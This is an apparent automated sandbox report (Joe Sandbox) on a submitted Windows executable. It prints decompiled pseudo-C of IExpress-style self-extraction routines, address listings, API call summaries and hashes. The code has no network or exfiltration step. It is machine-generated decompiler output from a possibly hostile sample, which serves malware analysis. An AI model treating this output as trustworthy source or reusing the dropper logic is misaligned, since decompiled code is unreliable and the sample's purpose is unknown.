                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								__eflags =  *0x178b3f - _t35; // 0x0
                                                                                                                                                                                                    								_t72 = 0;
                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                    									goto L10;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t101 = 0;
                                                                                                                                                                                                    							_t73 = E00175467(0x178b3e, 0, _t72);
                                                                                                                                                                                                    							__eflags = _t73;
                                                                                                                                                                                                    							if(_t73 != 0) {
                                                                                                                                                                                                    								L45:
                                                                                                                                                                                                    								_t38 = 1;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t101 = 0x4be;
                                                                                                                                                                                                    								E001744B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                    								goto L2;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t101 = 0x4b1;
                                                                                                                                                                                                    						E001744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                    						 *0x179124 = 0x80070714;
                                                                                                                                                                                                    						goto L2;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t101 = 0x4b5;
                                                                                                                                                                                                    					E001744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					 *0x179124 = E00176285();
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					_t38 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L47:
                                                                                                                                                                                                    				return E00176CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                    			}





































                                                                                                                                                                                                    0x001755ab
                                                                                                                                                                                                    0x001755b2
                                                                                                                                                                                                    0x001755c9
                                                                                                                                                                                                    0x001755d5
                                                                                                                                                                                                    0x001755d9
                                                                                                                                                                                                    0x00175600
                                                                                                                                                                                                    0x00175605
                                                                                                                                                                                                    0x0017560a
                                                                                                                                                                                                    0x0017560c
                                                                                                                                                                                                    0x00175638
                                                                                                                                                                                                    0x00175641
                                                                                                                                                                                                    0x00175643
                                                                                                                                                                                                    0x00175645
                                                                                                                                                                                                    0x00175645
                                                                                                                                                                                                    0x0017564c
                                                                                                                                                                                                    0x00175652
                                                                                                                                                                                                    0x00175657
                                                                                                                                                                                                    0x00175659
                                                                                                                                                                                                    0x00175696
                                                                                                                                                                                                    0x0017569c
                                                                                                                                                                                                    0x0017589f
                                                                                                                                                                                                    0x001758a7
                                                                                                                                                                                                    0x001758ac
                                                                                                                                                                                                    0x001758b3
                                                                                                                                                                                                    0x001758b5
                                                                                                                                                                                                    0x001756a2
                                                                                                                                                                                                    0x001756a2
                                                                                                                                                                                                    0x001756a8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001756ae
                                                                                                                                                                                                    0x001756ae
                                                                                                                                                                                                    0x001756b9
                                                                                                                                                                                                    0x001756bf
                                                                                                                                                                                                    0x001756c1
                                                                                                                                                                                                    0x001756f3
                                                                                                                                                                                                    0x001756f3
                                                                                                                                                                                                    0x00175705
                                                                                                                                                                                                    0x0017570a
                                                                                                                                                                                                    0x00175711
                                                                                                                                                                                                    0x00175717
                                                                                                                                                                                                    0x00175724
                                                                                                                                                                                                    0x00175726
                                                                                                                                                                                                    0x00175729
                                                                                                                                                                                                    0x00175730
                                                                                                                                                                                                    0x00175737
                                                                                                                                                                                                    0x0017573d
                                                                                                                                                                                                    0x00175740
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017572b
                                                                                                                                                                                                    0x0017572b
                                                                                                                                                                                                    0x0017572e
                                                                                                                                                                                                    0x00175742
                                                                                                                                                                                                    0x00175742
                                                                                                                                                                                                    0x00175745
                                                                                                                                                                                                    0x0017576b
                                                                                                                                                                                                    0x0017576b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175747
                                                                                                                                                                                                    0x00175747
                                                                                                                                                                                                    0x0017574d
                                                                                                                                                                                                    0x0017574f
                                                                                                                                                                                                    0x00175771
                                                                                                                                                                                                    0x00175771
                                                                                                                                                                                                    0x00175773
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175751
                                                                                                                                                                                                    0x00175751
                                                                                                                                                                                                    0x00175753
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175755
                                                                                                                                                                                                    0x0017575b
                                                                                                                                                                                                    0x00175760
                                                                                                                                                                                                    0x00175762
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175764
                                                                                                                                                                                                    0x00175764
                                                                                                                                                                                                    0x00175769
                                                                                                                                                                                                    0x0017577e
                                                                                                                                                                                                    0x0017577e
                                                                                                                                                                                                    0x00175781
                                                                                                                                                                                                    0x00175788
                                                                                                                                                                                                    0x0017578d
                                                                                                                                                                                                    0x0017578f
                                                                                                                                                                                                    0x001757b2
                                                                                                                                                                                                    0x001757b8
                                                                                                                                                                                                    0x001757bd
                                                                                                                                                                                                    0x001757bf
                                                                                                                                                                                                    0x001757cd
                                                                                                                                                                                                    0x001757cd
                                                                                                                                                                                                    0x001757dd
                                                                                                                                                                                                    0x001757e3
                                                                                                                                                                                                    0x001757ef
                                                                                                                                                                                                    0x001757f5
                                                                                                                                                                                                    0x001757f8
                                                                                                                                                                                                    0x0017580a
                                                                                                                                                                                                    0x0017580a
                                                                                                                                                                                                    0x001757fa
                                                                                                                                                                                                    0x00175802
                                                                                                                                                                                                    0x00175802
                                                                                                                                                                                                    0x0017580d
                                                                                                                                                                                                    0x0017580f
                                                                                                                                                                                                    0x00175830
                                                                                                                                                                                                    0x00175836
                                                                                                                                                                                                    0x0017583d
                                                                                                                                                                                                    0x0017584b
                                                                                                                                                                                                    0x00175851
                                                                                                                                                                                                    0x00175855
                                                                                                                                                                                                    0x0017585a
                                                                                                                                                                                                    0x0017585c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017585e
                                                                                                                                                                                                    0x0017585e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017585e
                                                                                                                                                                                                    0x00175811
                                                                                                                                                                                                    0x00175817
                                                                                                                                                                                                    0x00175819
                                                                                                                                                                                                    0x0017581f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017581f
                                                                                                                                                                                                    0x00175791
                                                                                                                                                                                                    0x00175797
                                                                                                                                                                                                    0x0017579c
                                                                                                                                                                                                    0x0017579e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001757a0
                                                                                                                                                                                                    0x001757a9
                                                                                                                                                                                                    0x001757ae
                                                                                                                                                                                                    0x001757b0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001757b0
                                                                                                                                                                                                    0x0017579e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175769
                                                                                                                                                                                                    0x00175762
                                                                                                                                                                                                    0x00175753
                                                                                                                                                                                                    0x0017574f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017572e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175864
                                                                                                                                                                                                    0x00175864
                                                                                                                                                                                                    0x00175864
                                                                                                                                                                                                    0x00175717
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001756c3
                                                                                                                                                                                                    0x001756c5
                                                                                                                                                                                                    0x001756c9
                                                                                                                                                                                                    0x001756ce
                                                                                                                                                                                                    0x001756d0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001756d6
                                                                                                                                                                                                    0x001756d6
                                                                                                                                                                                                    0x001756d8
                                                                                                                                                                                                    0x001756dd
                                                                                                                                                                                                    0x001756df
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001756e1
                                                                                                                                                                                                    0x001756e2
                                                                                                                                                                                                    0x001756e4
                                                                                                                                                                                                    0x001756e6
                                                                                                                                                                                                    0x001756eb
                                                                                                                                                                                                    0x001756ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001756f3
                                                                                                                                                                                                    0x001756f3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017586c
                                                                                                                                                                                                    0x00175878
                                                                                                                                                                                                    0x0017587e
                                                                                                                                                                                                    0x00175882
                                                                                                                                                                                                    0x00175883
                                                                                                                                                                                                    0x00175889
                                                                                                                                                                                                    0x0017588e
                                                                                                                                                                                                    0x0017588e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175896
                                                                                                                                                                                                    0x001756ed
                                                                                                                                                                                                    0x001756df
                                                                                                                                                                                                    0x001756d0
                                                                                                                                                                                                    0x001756c1
                                                                                                                                                                                                    0x001756a8
                                                                                                                                                                                                    0x0017565b
                                                                                                                                                                                                    0x0017565b
                                                                                                                                                                                                    0x0017565d
                                                                                                                                                                                                    0x00175669
                                                                                                                                                                                                    0x00175669
                                                                                                                                                                                                    0x0017565f
                                                                                                                                                                                                    0x0017565f
                                                                                                                                                                                                    0x00175665
                                                                                                                                                                                                    0x00175667
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175667
                                                                                                                                                                                                    0x0017566c
                                                                                                                                                                                                    0x00175673
                                                                                                                                                                                                    0x00175678
                                                                                                                                                                                                    0x0017567a
                                                                                                                                                                                                    0x0017589b
                                                                                                                                                                                                    0x0017589b
                                                                                                                                                                                                    0x00175680
                                                                                                                                                                                                    0x00175685
                                                                                                                                                                                                    0x0017568c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017568c
                                                                                                                                                                                                    0x0017567a
                                                                                                                                                                                                    0x0017560e
                                                                                                                                                                                                    0x00175613
                                                                                                                                                                                                    0x0017561a
                                                                                                                                                                                                    0x00175620
                                                                                                                                                                                                    0x00175626
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175626
                                                                                                                                                                                                    0x001755db
                                                                                                                                                                                                    0x001755e0
                                                                                                                                                                                                    0x001755e7
                                                                                                                                                                                                    0x001755f1
                                                                                                                                                                                                    0x001755f6
                                                                                                                                                                                                    0x001755f6
                                                                                                                                                                                                    0x001755f6
                                                                                                                                                                                                    0x001758b7
                                                                                                                                                                                                    0x001758c7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
                                                                                                                                                                                                      • Part of subcall function 0017468F: SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
                                                                                                                                                                                                      • Part of subcall function 0017468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
                                                                                                                                                                                                      • Part of subcall function 0017468F: LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
                                                                                                                                                                                                      • Part of subcall function 0017468F: LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
                                                                                                                                                                                                      • Part of subcall function 0017468F: memcpy_s.MSVCRT ref: 001746E5
                                                                                                                                                                                                      • Part of subcall function 0017468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 001755CF
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00175638
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0017564C
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00175620
                                                                                                                                                                                                      • Part of subcall function 001744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                      • Part of subcall function 001744B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                      • Part of subcall function 00176285: GetLastError.KERNEL32(00175BBC), ref: 00176285
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 001756B9
                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0017571E
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00175737
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 001757CD
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 001757EF
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00175802
                                                                                                                                                                                                      • Part of subcall function 00172630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00172654
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00175830
                                                                                                                                                                                                      • Part of subcall function 00176517: FindResourceA.KERNEL32(00170000,000007D6,00000005), ref: 0017652A
                                                                                                                                                                                                      • Part of subcall function 00176517: LoadResource.KERNEL32(00170000,00000000,?,?,00172EE8,00000000,001719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00176538
                                                                                                                                                                                                      • Part of subcall function 00176517: DialogBoxIndirectParamA.USER32(00170000,00000000,00000547,001719E0,00000000), ref: 00176557
                                                                                                                                                                                                      • Part of subcall function 00176517: FreeResource.KERNEL32(00000000,?,?,00172EE8,00000000,001719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00176560
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00175878
                                                                                                                                                                                                      • Part of subcall function 0017597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001759A8
                                                                                                                                                                                                      • Part of subcall function 0017597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 001759AF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                    • API String ID: 2436801531-3855382519
                                                                                                                                                                                                    • Opcode ID: b4e859a15d435b28b4742e134f8d80320600fa9f307c041ebb573654bc2e632f
                                                                                                                                                                                                    • Instruction ID: 243ca43526e49a13c460222f72841225da3dd8fccc8a6f2830100483d3ff1e9e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4e859a15d435b28b4742e134f8d80320600fa9f307c041ebb573654bc2e632f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B3812B71A04A049BDB24AB758C45BEE777F9F60300F8484A5F58ED2591EFF08EC58A61
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 406 1744b9-1744f8 407 1744fe-174525 LoadStringA 406->407 408 174679-17467b 406->408 409 174527-17452e call 17681f 407->409 410 174562-174568 407->410 411 17467c-17468c call 176ce0 408->411 418 174530-17453d call 1767c9 409->418 419 17453f 409->419 414 17456b-174570 410->414 414->414 417 174572-17457c 414->417 420 17457e-174580 417->420 421 1745c9-1745cb 417->421 418->419 425 174544-174554 MessageBoxA 418->425 419->425 426 174583-174588 420->426 423 174607-174617 LocalAlloc 421->423 424 1745cd-1745cf 421->424 429 17455a-17455d 423->429 430 17461d-174628 call 171680 423->430 428 1745d2-1745d7 424->428 425->429 426->426 431 17458a-17458c 426->431 428->428 432 1745d9-1745ed LocalAlloc 428->432 429->411 437 17462d-17463d MessageBeep call 17681f 430->437 434 17458f-174594 431->434 432->429 436 1745f3-174605 call 17171e 432->436 434->434 435 174596-1745ad LocalAlloc 434->435 435->429 438 1745af-1745c7 call 17171e 435->438 436->437 444 17463f-17464c call 1767c9 437->444 445 17464e 437->445 438->437 444->445 448 174653-174677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                    			E001744B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                    				char _v576;
                                                                                                                                                                                                    				void* _v580;
                                                                                                                                                                                                    				struct HWND__* _v584;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                    				signed int _t44;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				signed int _t52;
                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                    				int _t64;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				intOrPtr* _t67;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                    				intOrPtr* _t76;
                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                    				void* _t82;
                                                                                                                                                                                                    				intOrPtr* _t84;
                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                    				signed int _t89;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t75 = __edx;
                                                                                                                                                                                                    				_t34 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                    				_v584 = __ecx;
                                                                                                                                                                                                    				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                    				_t67 = _a4;
                                                                                                                                                                                                    				_t69 = 0xd;
                                                                                                                                                                                                    				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                    				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                    				_v580 = _t37;
                                                                                                                                                                                                    				asm("movsb");
                                                                                                                                                                                                    				if(( *0x178a38 & 0x00000001) != 0) {
                                                                                                                                                                                                    					_t39 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_v576 = 0;
                                                                                                                                                                                                    					LoadStringA( *0x179a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                    					if(_v576 != 0) {
                                                                                                                                                                                                    						_t73 =  &_v576;
                                                                                                                                                                                                    						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                    						_t75 = _t16;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t43 =  *_t73;
                                                                                                                                                                                                    							_t73 = _t73 + 1;
                                                                                                                                                                                                    						} while (_t43 != 0);
                                                                                                                                                                                                    						_t84 = _v580;
                                                                                                                                                                                                    						_t74 = _t73 - _t75;
                                                                                                                                                                                                    						if(_t84 == 0) {
                                                                                                                                                                                                    							if(_t67 == 0) {
                                                                                                                                                                                                    								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                    								_t83 = _t27;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t75 = _t83;
                                                                                                                                                                                                    									_t74 = _t80;
                                                                                                                                                                                                    									E00171680(_t80, _t83,  &_v576);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t76 = _t67;
                                                                                                                                                                                                    								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                    								_t85 = _t24;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t55 =  *_t76;
                                                                                                                                                                                                    									_t76 = _t76 + 1;
                                                                                                                                                                                                    								} while (_t55 != 0);
                                                                                                                                                                                                    								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                    								_t83 = _t25 + _t74;
                                                                                                                                                                                                    								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                    								_t80 = _t44;
                                                                                                                                                                                                    								if(_t80 == 0) {
                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									E0017171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t77 = _t67;
                                                                                                                                                                                                    							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                    							_t81 = _t18;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t58 =  *_t77;
                                                                                                                                                                                                    								_t77 = _t77 + 1;
                                                                                                                                                                                                    							} while (_t58 != 0);
                                                                                                                                                                                                    							_t75 = _t77 - _t81;
                                                                                                                                                                                                    							_t82 = _t84 + 1;
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t59 =  *_t84;
                                                                                                                                                                                                    								_t84 = _t84 + 1;
                                                                                                                                                                                                    							} while (_t59 != 0);
                                                                                                                                                                                                    							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                    							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                    							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                    							_t80 = _t44;
                                                                                                                                                                                                    							if(_t80 == 0) {
                                                                                                                                                                                                    								goto L6;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_push(_v580);
                                                                                                                                                                                                    								E0017171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                    								L23:
                                                                                                                                                                                                    								MessageBeep(_a12);
                                                                                                                                                                                                    								if(E0017681F(_t67) == 0) {
                                                                                                                                                                                                    									L25:
                                                                                                                                                                                                    									_t49 = 0x10000;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t54 = E001767C9(_t74, _t74);
                                                                                                                                                                                                    									_t49 = 0x190000;
                                                                                                                                                                                                    									if(_t54 == 0) {
                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t52 = MessageBoxA(_v584, _t80, "nst0dum", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                    								_t83 = _t52;
                                                                                                                                                                                                    								LocalFree(_t80);
                                                                                                                                                                                                    								_t39 = _t52;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(E0017681F(_t67) == 0) {
                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                    							_t64 = 0x10010;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t66 = E001767C9(0, 0);
                                                                                                                                                                                                    							_t64 = 0x190010;
                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t44 = MessageBoxA(_v584,  &_v64, "nst0dum", _t64);
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                    			}



































                                                                                                                                                                                                    0x001744b9
                                                                                                                                                                                                    0x001744c4
                                                                                                                                                                                                    0x001744cb
                                                                                                                                                                                                    0x001744d8
                                                                                                                                                                                                    0x001744e4
                                                                                                                                                                                                    0x001744eb
                                                                                                                                                                                                    0x001744ee
                                                                                                                                                                                                    0x001744ef
                                                                                                                                                                                                    0x001744ef
                                                                                                                                                                                                    0x001744f1
                                                                                                                                                                                                    0x001744f7
                                                                                                                                                                                                    0x001744f8
                                                                                                                                                                                                    0x0017467b
                                                                                                                                                                                                    0x001744fe
                                                                                                                                                                                                    0x00174509
                                                                                                                                                                                                    0x00174518
                                                                                                                                                                                                    0x00174525
                                                                                                                                                                                                    0x00174562
                                                                                                                                                                                                    0x00174568
                                                                                                                                                                                                    0x00174568
                                                                                                                                                                                                    0x0017456b
                                                                                                                                                                                                    0x0017456b
                                                                                                                                                                                                    0x0017456d
                                                                                                                                                                                                    0x0017456e
                                                                                                                                                                                                    0x00174572
                                                                                                                                                                                                    0x00174578
                                                                                                                                                                                                    0x0017457c
                                                                                                                                                                                                    0x001745cb
                                                                                                                                                                                                    0x00174607
                                                                                                                                                                                                    0x00174607
                                                                                                                                                                                                    0x0017460d
                                                                                                                                                                                                    0x00174613
                                                                                                                                                                                                    0x00174617
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017461d
                                                                                                                                                                                                    0x00174623
                                                                                                                                                                                                    0x00174626
                                                                                                                                                                                                    0x00174628
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174628
                                                                                                                                                                                                    0x001745cd
                                                                                                                                                                                                    0x001745cd
                                                                                                                                                                                                    0x001745cf
                                                                                                                                                                                                    0x001745cf
                                                                                                                                                                                                    0x001745d2
                                                                                                                                                                                                    0x001745d2
                                                                                                                                                                                                    0x001745d4
                                                                                                                                                                                                    0x001745d5
                                                                                                                                                                                                    0x001745db
                                                                                                                                                                                                    0x001745de
                                                                                                                                                                                                    0x001745e3
                                                                                                                                                                                                    0x001745e9
                                                                                                                                                                                                    0x001745ed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001745f3
                                                                                                                                                                                                    0x001745fd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00174602
                                                                                                                                                                                                    0x001745ed
                                                                                                                                                                                                    0x0017457e
                                                                                                                                                                                                    0x0017457e
                                                                                                                                                                                                    0x00174580
                                                                                                                                                                                                    0x00174580
                                                                                                                                                                                                    0x00174583
                                                                                                                                                                                                    0x00174583
                                                                                                                                                                                                    0x00174585
                                                                                                                                                                                                    0x00174586
                                                                                                                                                                                                    0x0017458a
                                                                                                                                                                                                    0x0017458c
                                                                                                                                                                                                    0x0017458f
                                                                                                                                                                                                    0x0017458f
                                                                                                                                                                                                    0x00174591
                                                                                                                                                                                                    0x00174592
                                                                                                                                                                                                    0x0017459b
                                                                                                                                                                                                    0x0017459e
                                                                                                                                                                                                    0x001745a3
                                                                                                                                                                                                    0x001745a9
                                                                                                                                                                                                    0x001745ad
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001745af
                                                                                                                                                                                                    0x001745af
                                                                                                                                                                                                    0x001745bf
                                                                                                                                                                                                    0x0017462d
                                                                                                                                                                                                    0x00174630
                                                                                                                                                                                                    0x0017463d
                                                                                                                                                                                                    0x0017464e
                                                                                                                                                                                                    0x0017464e
                                                                                                                                                                                                    0x0017463f
                                                                                                                                                                                                    0x00174640
                                                                                                                                                                                                    0x00174647
                                                                                                                                                                                                    0x0017464c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017464c
                                                                                                                                                                                                    0x00174666
                                                                                                                                                                                                    0x0017466d
                                                                                                                                                                                                    0x0017466f
                                                                                                                                                                                                    0x00174675
                                                                                                                                                                                                    0x00174675
                                                                                                                                                                                                    0x001745ad
                                                                                                                                                                                                    0x00174527
                                                                                                                                                                                                    0x0017452e
                                                                                                                                                                                                    0x0017453f
                                                                                                                                                                                                    0x0017453f
                                                                                                                                                                                                    0x00174530
                                                                                                                                                                                                    0x00174531
                                                                                                                                                                                                    0x00174538
                                                                                                                                                                                                    0x0017453d
                                                                                                                                                                                                    0x00000000
